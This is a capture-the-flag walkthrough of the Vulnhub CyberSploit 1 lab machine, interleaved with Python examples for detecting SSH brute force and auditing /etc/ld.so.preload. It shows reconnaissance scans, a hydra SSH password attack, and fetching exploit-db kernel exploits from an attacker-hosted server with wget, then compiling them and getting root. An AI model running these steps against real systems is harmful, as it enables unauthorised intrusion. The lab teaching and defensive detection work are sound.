
Vulnhub CyberSploit: a detailed walkthrough of the target machine

Posted: 2023-01-17 11:44:23

CyberSploit

Target machine information

Name: cybersploit 1

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                               
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:72:62:36      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.176  08:00:27:df:60:2f      1      60  PCS Systemtechnik GmbH                      

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.176.

NMAP scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-16 20:52 EST
Nmap scan report for localhost (192.168.56.176)
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Hello Pentester!
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:DF:60:2F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds

The NMAP scan shows the target has 2 open ports: 22 (SSH) and 80 (HTTP).

Getting a shell

Visiting port 80 in a browser, the source of the returned page contains a comment:

</pre>



<!-------------username:itsskv--------------------->
</body>
</html>

Is this the SSH username? Could it be brute-forced with hydra? Set that aside for now and check whether directory scanning turns up more information.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ curl http://192.168.56.176/robots.txt                                          
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9 

                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ echo 'R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9' | base64 -d
Good Work !
Flag1: cybersploit{youtube.com/c/cybersploit}               

This gives the first flag.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ nikto -h http://192.168.56.176                       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.176
+ Target Hostname:    192.168.56.176
+ Target Port:        80
+ Start Time:         2023-01-16 20:56:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 153327, size: 2333, mtime: Sat Jun 27 00:46:41 2020
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-01-16 20:57:17 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.176
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/01/16 20:57:55 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 2333]
/robots               (Status: 200) [Size: 79]
/hacker               (Status: 200) [Size: 3757743]
/server-status        (Status: 403) [Size: 295]
Progress: 220320 / 220561 (99.89%)
===============================================================
2023/01/16 20:59:35 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ gobuster dir -u http://192.168.56.176 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.176
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              txt,sh,php,html
[+] Timeout:                 10s
===============================================================
2023/01/16 21:00:35 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 2333]
/index.html           (Status: 200) [Size: 2333]
/.html                (Status: 403) [Size: 287]
/robots.txt           (Status: 200) [Size: 79]
/robots               (Status: 200) [Size: 79]
/hacker               (Status: 200) [Size: 3757743]
/.html                (Status: 403) [Size: 287]
/server-status        (Status: 403) [Size: 295]
Progress: 1101828 / 1102805 (99.91%)
===============================================================
2023/01/16 21:09:45 Finished
====================================================

Among these, the hacker directory contains a single image (GIF format). Before continuing with other wordlists or tools for directory scanning, let's see whether the SSH password can be cracked first.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ hydra -l itsskv -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.176 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:11:40
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.176:22/
[STATUS] 78.00 tries/min, 78 tries in 00:01h, 14344327 to do in 3065:02h, 10 active
[STATUS] 72.00 tries/min, 216 tries in 00:03h, 14344189 to do in 3320:25h, 10 active
[STATUS] 66.57 tries/min, 466 tries in 00:07h, 14343939 to do in 3591:07h, 10 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
                                                                                       

Not cracked.

Oops: the flag1 we obtained is itself the SSH password. It really does not look like a password, so no wonder it could not be brute-forced.
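From the defender's side, the hydra run above is very visible: 10 parallel tasks producing roughly 70-80 password failures per minute against one account, all from one source. The following is an added example, not code from the write-up, showing the detection logic a host-based monitor would apply to sshd's auth.log. The log lines are constructed to match the syslog format OpenSSH uses for rejected passwords; the attacking address 192.168.56.146 is the one the write-up later uses to serve exploit files, and the function names are my own.

```python
"""Detect SSH password-guessing bursts in sshd auth.log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Shape of the line OpenSSH writes to auth.log for each rejected password
# (assumption: default syslog timestamp format, no year).
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_failed_login(line):
    """Return (timestamp, source_ip, username) for a failed-password line, else None."""
    m = FAILED_RE.match(line.strip())
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults it to 1900, fine for windowing
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%b %d %H:%M:%S")
    return ts, m.group("ip"), m.group("user")


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Sliding-window count of failures per source IP.

    Returns {ip: peak_failures_within_window} for every IP that reached `threshold`.
    Lines are expected in chronological order, as they appear in the log.
    """
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        event = parse_failed_login(line)
        if event is None:
            continue
        ts, ip, _user = event
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[ip] = max(alerts.get(ip, 0), len(q))
    return alerts


def sample_auth_log():
    """Constructed excerpt: a 12-attempt burst against itsskv within 22 s from
    192.168.56.146, one stray failure from another host, then one successful login."""
    lines = [
        f"Jan 16 21:11:{30 + 2 * i:02d} cybersploit-CTF sshd[{2300 + i}]: "
        f"Failed password for itsskv from 192.168.56.146 port {51000 + i} ssh2"
        for i in range(12)
    ]
    lines.append("Jan 16 21:12:05 cybersploit-CTF sshd[2350]: "
                 "Failed password for invalid user admin from 192.168.56.1 port 40000 ssh2")
    lines.append("Jan 16 21:15:02 cybersploit-CTF sshd[2400]: "
                 "Accepted password for itsskv from 192.168.56.146 port 52000 ssh2")
    return lines


if __name__ == "__main__":
    for ip, peak in detect_bruteforce(sample_auth_log()).items():
        print(f"ALERT {ip}: {peak} failed SSH logins inside a 60 s window")
```

This is the same counting that fail2ban automates before inserting a firewall rule; on the server side, lowering `MaxAuthTries` in sshd_config and disabling password authentication in favour of keys removes the attack surface that makes a guessable flag-as-password exploitable at all.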

┌──(kali㉿kali)-[~/Desktop/Vulnhub/CyberSploit]
└─$ ssh itsskv@192.168.56.176
The authenticity of host '192.168.56.176 (192.168.56.176)' can't be established.
ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.176' (ECDSA) to the list of known hosts.
itsskv@192.168.56.176's password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

332 packages can be updated.
273 updates are security updates.

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
itsskv@cybersploit-CTF:~$ id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:~$ ls -alh
total 156K
drwxr-xr-x 20 itsskv itsskv 4.0K Jun 27  2020 .
drwxr-xr-x  4 root   root   4.0K Jun 25  2020 ..
-rw-------  1 itsskv itsskv  233 Jun 27  2020 .bash_history
-rw-r--r--  1 itsskv itsskv  220 Jun 25  2020 .bash_logout
-rw-r--r--  1 itsskv itsskv 3.5K Jun 25  2020 .bashrc
drwx------ 14 itsskv itsskv 4.0K Jun 25  2020 .cache
drwx------  9 itsskv itsskv 4.0K Jun 25  2020 .config
drwx------  3 itsskv itsskv 4.0K Jun 25  2020 .dbus
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Desktop
-rw-r--r--  1 itsskv itsskv   25 Jun 26  2020 .dmrc
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Documents
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Downloads
-rw-r--r--  1 itsskv itsskv 8.3K Jun 25  2020 examples.desktop
-rw-rw-r--  1 itsskv itsskv  495 Jun 27  2020 flag2.txt
drwx------  3 itsskv itsskv 4.0K Jun 26  2020 .gconf
drwx------  4 itsskv itsskv 4.0K Jun 25  2020 .gnome2
-rw-rw-r--  1 itsskv itsskv  142 Jun 26  2020 .gtk-bookmarks
drwx------  2 itsskv itsskv 4.0K Jun 25  2020 .gvfs
-rw-------  1 itsskv itsskv 1.1K Jun 26  2020 .ICEauthority
drwxr-xr-x  3 itsskv itsskv 4.0K Jun 25  2020 .local
drwx------  3 itsskv itsskv 4.0K Jun 25  2020 .mission-control
drwx------  4 itsskv itsskv 4.0K Jun 25  2020 .mozilla
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Music
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Pictures
-rw-r--r--  1 itsskv itsskv  675 Jun 25  2020 .profile
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Public
drwx------  2 itsskv itsskv 4.0K Jun 26  2020 .pulse
-rw-------  1 itsskv itsskv  256 Jun 25  2020 .pulse-cookie
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Templates
drwxr-xr-x  2 itsskv itsskv 4.0K Jun 25  2020 Videos
-rw-------  1 itsskv itsskv    0 Jun 26  2020 .Xauthority
-rw-------  1 itsskv itsskv  12K Jun 26  2020 .xsession-errors
-rw-------  1 itsskv itsskv  14K Jun 26  2020 .xsession-errors.old
itsskv@cybersploit-CTF:~$ cat flag2.txt
01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
itsskv@cybersploit-CTF:~$ 

Decode it with CyberChef (From Binary):

good work !
flag2: cybersploit{https:t.me/cybersploit1}
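Both flags so far are plain encodings rather than encryption: robots.txt held base64, flag2.txt held space-separated 8-bit binary octets. As an added example (not part of the original write-up), the script below recognises and decodes both forms and pulls the `cybersploit{...}` flag out of the result; the two input strings are copied from the values shown above, and the function names are my own.

```python
"""Decode the two flag encodings met on this box: base64 and binary octets (added example)."""
from __future__ import annotations

import base64
import re

# Inputs copied from the walkthrough: the robots.txt body and the contents of flag2.txt.
ROBOTS_B64 = "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9"
FLAG2_BITS = (
    "01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 "
    "00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 "
    "01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 "
    "01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 "
    "01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 "
    "01101111 01101001 01110100 00110001 01111101"
)

BIT_OCTETS_RE = re.compile(r"^[01]{8}(?:\s+[01]{8})*$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
FLAG_RE = re.compile(r"cybersploit\{[^}]*\}")


def decode_binary_octets(text: str) -> str:
    """Turn '01100111 01101111 ...' into text; every token must be exactly 8 bits."""
    octets = text.split()
    bad = [o for o in octets if len(o) != 8 or set(o) - {"0", "1"}]
    if bad:
        raise ValueError(f"not 8-bit binary octets: {bad[:3]}")
    return bytes(int(o, 2) for o in octets).decode("utf-8")


def decode_base64(text: str) -> str:
    # validate=True rejects stray characters instead of silently skipping them
    return base64.b64decode(text.strip(), validate=True).decode("utf-8")


def auto_decode(text: str) -> tuple[str, str]:
    """Guess the encoding (most specific pattern first) and return (encoding, plaintext)."""
    s = text.strip()
    if BIT_OCTETS_RE.match(s):
        return "binary", decode_binary_octets(s)
    if BASE64_RE.match(s) and len(s) % 4 == 0:
        return "base64", decode_base64(s)
    raise ValueError("unrecognised encoding")


def extract_flags(text: str) -> list[str]:
    return FLAG_RE.findall(text)


if __name__ == "__main__":
    for blob in (ROBOTS_B64, FLAG2_BITS):
        encoding, plain = auto_decode(blob)
        print(f"[{encoding}] {plain!r} -> {extract_flags(plain)}")
```

The order of the checks matters: a binary-octet string also satisfies the base64 alphabet, so the stricter pattern has to be tried first.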

Privilege escalation

Upload the linpeas script to the target's /tmp directory, make it executable, and run it:

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                                                       
  [1] exploit_x                                                                                                               
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [2] overlayfs
      CVE-2015-8660
      Source: http://www.exploit-db.com/exploits/39230
  [3] pp_key
      CVE-2016-0728
      Source: http://www.exploit-db.com/exploits/39277
  [4] timeoutpwn
      CVE-2014-0038
      Source: http://www.exploit-db.com/exploits/31346

itsskv@cybersploit-CTF:/tmp$ chmod +x linpeas.sh
itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/39230.c
--2023-01-17 08:55:20--  http://192.168.56.146:8000/39230.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: `39230.c'

100%[====================================================================================>] 8,487       --.-K/s   in 0s      

2023-01-17 08:55:20 (40.2 MB/s) - `39230.c' saved [8487/8487]

itsskv@cybersploit-CTF:/tmp$ gcc -o exploit 39230.c
itsskv@cybersploit-CTF:/tmp$ chmod +x ./exploit
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ ./exploit
Failed to open setgroups
itsskv@cybersploit-CTF:/tmp$ euid: 65534, egid: 65534
id
uid=1001(itsskv) gid=1001(itsskv) groups=1001(itsskv)
itsskv@cybersploit-CTF:/tmp$ 

The exploit failed.

itsskv@cybersploit-CTF:/tmp$ wget http://192.168.56.146:8000/37292.c
--2023-01-17 09:00:00--  http://192.168.56.146:8000/37292.c
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: `37292.c'

100%[====================================================================================>] 4,968       --.-K/s   in 0s      

2023-01-17 09:00:00 (684 MB/s) - `37292.c' saved [4968/4968]

itsskv@cybersploit-CTF:/tmp$ gcc -o exploit2 37292.c
itsskv@cybersploit-CTF:/tmp$ chmod +x exploit2
itsskv@cybersploit-CTF:/tmp$ ./exploit2
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 40K
drwx------  5 root root 4.0K Jun 27  2020 .
drwxr-xr-x 23 root root 4.0K Jun 25  2020 ..
-rw-------  1 root root  705 Jun 27  2020 .bash_history
-rw-r--r--  1 root root 3.1K Apr 19  2012 .bashrc
drwx------  3 root root 4.0K Jun 27  2020 .cache
drwx------  3 root root 4.0K Jun 27  2020 .dbus
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4.0K Jan 17 07:20 .pulse
-rw-------  1 root root  256 Jun 25  2020 .pulse-cookie
-rw-r--r--  1 root root 1.2K Jun 27  2020 finalflag.txt
# cat finalflag.txt
  ______ ____    ____ .______    _______ .______          _______..______    __        ______    __  .___________.
 /      |\   \  /   / |   _  \  |   ____||   _  \        /       ||   _  \  |  |      /  __  \  |  | |           |
|  ,----' \   \/   /  |  |_)  | |  |__   |  |_)  |      |   (----`|  |_)  | |  |     |  |  |  | |  | `---|  |----`
|  |       \_    _/   |   _  <  |   __|  |      /        \   \    |   ___/  |  |     |  |  |  | |  |     |  |     
|  `----.    |  |     |  |_)  | |  |____ |  |\  \----.----)   |   |  |      |  `----.|  `--'  | |  |     |  |     
 \______|    |__|     |______/  |_______|| _| `._____|_______/    | _|      |_______| \______/  |__|     |__|     
                                                                                                                  

   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ 
 ( c | o | n | g | r | a | t | u | l | a | t | i | o | n | s )
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ 

flag3: cybersploit{Z3X21CW42C4 many many congratulations !}

if you like it share with me https://twitter.com/cybersploit1.

Thanks !
# 

Using a different exploit script, privilege escalation succeeded.
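The working exploit announces what it did: "/etc/ld.so.preload created". That file is read by the dynamic loader and every library listed in it is injected into every dynamically linked process, setuid binaries included, which is why privilege-escalation and persistence tooling targets it and why, on a healthy host, it normally does not exist at all. As an added example (not code from the write-up or from the exploit), the audit below reports the presence of the file and any entry that points outside the system library directories, is missing, or is owned or writable by a non-root user. The trusted-directory list assumes a stock Debian/Ubuntu layout, and the demo builds a constructed preload file in a temporary directory so it runs without touching the real /etc.

```python
"""Audit /etc/ld.so.preload for signs of tampering (added example)."""
import stat
import tempfile
from pathlib import Path

# Where legitimately preloaded libraries normally live (assumption: Debian/Ubuntu layout).
TRUSTED_LIB_DIRS = ("/lib", "/lib32", "/lib64", "/usr/lib", "/usr/lib32", "/usr/lib64")


def audit_ld_preload(preload_path="/etc/ld.so.preload"):
    """Return a list of (code, detail) findings; an empty list means nothing suspicious."""
    path = Path(preload_path)
    findings = []
    if not path.exists():
        return findings
    findings.append(("exists", f"{path} is present"))
    st = path.stat()
    if st.st_uid != 0:
        findings.append(("not_root_owned", f"{path} owned by uid {st.st_uid}"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("writable", f"{path} is group- or world-writable"))
    for raw in path.read_text(errors="replace").splitlines():
        lib = raw.split("#", 1)[0].strip()  # the loader ignores '#' comments
        if not lib:
            continue
        if not lib.startswith("/"):
            findings.append(("relative_path", f"relative entry {lib!r}"))
            continue
        if not any(lib.startswith(d + "/") for d in TRUSTED_LIB_DIRS):
            findings.append(("untrusted_dir", f"{lib} lives outside system library dirs"))
        lib_path = Path(lib)
        if not lib_path.exists():
            findings.append(("missing_library", f"{lib} does not exist"))
            continue
        lst = lib_path.stat()
        if lst.st_uid != 0:
            findings.append(("library_not_root_owned", f"{lib} owned by uid {lst.st_uid}"))
        if lst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(("library_writable", f"{lib} is group- or world-writable"))
    return findings


def demo_with_constructed_sample():
    """Constructed case: a preload file naming a library planted in a temp directory."""
    tmp = Path(tempfile.mkdtemp(prefix="ldpreload-demo-"))
    planted = tmp / "planted.so"
    planted.write_bytes(b"not a real shared object")  # stand-in for an injected library
    preload = tmp / "ld.so.preload"
    preload.write_text(f"{planted}\n")
    return audit_ld_preload(preload)


if __name__ == "__main__":
    for code, detail in demo_with_constructed_sample():
        print(f"{code:24} {detail}")
    print("real host:", audit_ld_preload() or "no /etc/ld.so.preload, nothing to report")
```

Run periodically, or hooked to an inotify watch on /etc, this catches the artefact the exploit leaves regardless of which kernel bug was used to write it; patching the kernel is the actual fix, since the box is an EOL Ubuntu 12.04 with 273 pending security updates.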

From: https://www.cnblogs.com/jason-huawen/p/17057471.html
